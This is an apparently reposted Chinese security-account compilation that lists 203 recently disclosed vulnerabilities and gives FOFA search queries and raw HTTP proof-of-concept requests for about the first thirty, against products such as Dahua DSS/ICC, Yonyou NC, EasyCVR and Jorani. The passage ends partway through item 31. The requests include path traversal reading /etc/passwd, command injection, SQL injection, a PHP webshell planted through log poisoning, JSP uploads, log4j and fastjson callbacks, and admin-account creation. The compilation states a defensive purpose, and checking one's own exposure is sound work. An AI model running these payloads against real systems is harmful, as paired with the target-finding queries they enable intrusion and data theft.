
Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29

Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of attack methods in offensive and defensive security work; we hope this article helps with everyone's defence. Defenders can use its contents to check their own exposure to these risks.

Vulnerability sources: the article covers 203 high-severity vulnerability POCs published domestically and abroad between September 2023 and May 2024, all taken from other public accounts or websites on the internet and compiled and published by the 网络安全新视界 team.

Security patches: all vulnerabilities are public; for patches or remediation plans, contact the product vendor.

Content: owing to length limits, a few POCs that were too long have been replaced uniformly with the word PAYLOAD; search for the full POC yourself if you need it.

Legitimate rights: if the article's content infringes any party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify the process and make browsing easier, there is no "reply to get the full list". This article is currently the most complete version; when using it, just press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友 NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微 E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus handheld service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视 (Uniview) video surveillance main-cgi password leak
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of your own password.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"

Log in to the backend with the default account admin, then perform the following operation.

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the following statement, URL-encoded twice:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step one: obtain the cookie.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the function it plants executes a base64-encoded command.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to execute the id command; ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The leaked content includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The leaked content includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The POC calls a database function to compute the MD5 of 1234.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友 NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
